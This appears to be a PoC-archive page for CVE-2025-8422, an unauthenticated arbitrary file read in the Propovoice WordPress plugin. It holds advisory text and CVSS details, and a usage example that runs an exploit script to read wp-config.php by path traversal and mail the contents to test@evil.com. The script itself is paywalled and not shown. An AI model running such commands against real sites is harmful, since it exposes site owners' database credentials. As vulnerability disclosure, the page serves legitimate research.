Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1336 CNY

100%

CVE-2025-8422 PoC — Propovoice <= 1.7.6.7 - Unauthenticated Arbitrary File Read

Source
Associated Vulnerability
Title: Propovoice <= 1.7.6.7 - Unauthenticated Arbitrary File Read (CVE-2025-8422)
Description:The Propovoice: All-in-One Client Management System plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 1.7.6.7 via the send_email() function. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.
Description
Propovoice <= 1.7.6.7 - Unauthenticated Arbitrary File Read
Readme
# CVE-2025-8422
Propovoice <= 1.7.6.7 - Unauthenticated Arbitrary File Read

# Description

The Propovoice: All-in-One Client Management System plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 1.7.6.7 via the send_email() function. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.

## Details

- **Type**: plugin
- **Slug**: propovoice
- **Affected Version**: 1.7.6.7
- **CVSS Score**: 7.5
- **CVSS Rating**: High
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- **CVE**: CVE-2025-8422
- **Status**: Closed

POC
---
```
Usage: python3 cve-2025-8422-exploit.py <target_url> <email_recipient> [target_file]

Examples:
  python3 cve-2025-8422-exploit.py https://example.com admin@example.com
  python3 cve-2025-8422-exploit.py https://example.com test@evil.com /../../../wp-config.php
  ```
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →